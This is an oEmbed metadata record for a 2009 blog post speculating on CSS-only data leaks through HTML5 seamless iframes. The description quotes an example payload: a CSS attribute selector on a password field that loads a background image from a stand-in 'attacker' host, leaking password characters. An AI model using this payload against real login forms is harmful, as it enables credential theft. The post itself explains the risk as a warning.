{"provider_name":"Hatena Blog","published":"2009-08-04 00:00:00","blog_title":"hoshikuzu | star_dust \u306e\u66f8\u658e","provider_url":"https://hatena.blog","categories":[],"author_url":"https://blog.hatena.ne.jp/hoshikuzu/","blog_url":"https://hoshikuzu.hatenadiary.org/","title":"pure css-based XSS attacks ?","version":"1.0","height":"190","author_name":"hoshikuzu","description":"pure css-based XSS attacks ?<style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=\u201dlogin.asp\u201d/> HTML5 includes \"seamless\" iframes could allow for pure css-based XSS attacks If a vector like this were to become feasible in the near future, it would be extremely dangerous. Well, if XSS succeeds, it is only natural that the contents of the input elements in a form would leak\u2026","url":"https://hoshikuzu.hatenadiary.org/entry/20090804/p1","type":"rich","width":"100%","html":"<iframe src=\"https://hatenablog-parts.com/embed?url=https%3A%2F%2Fhoshikuzu.hatenadiary.org%2Fentry%2F20090804%2Fp1\" title=\"pure css-based XSS attacks ? - hoshikuzu | star_dust \u306e\u66f8\u658e\" class=\"embed-card embed-blogcard\" scrolling=\"no\" frameborder=\"0\" style=\"display: block; width: 100%; height: 190px; max-width: 500px; margin: 10px 0px;\"></iframe>","image_url":null}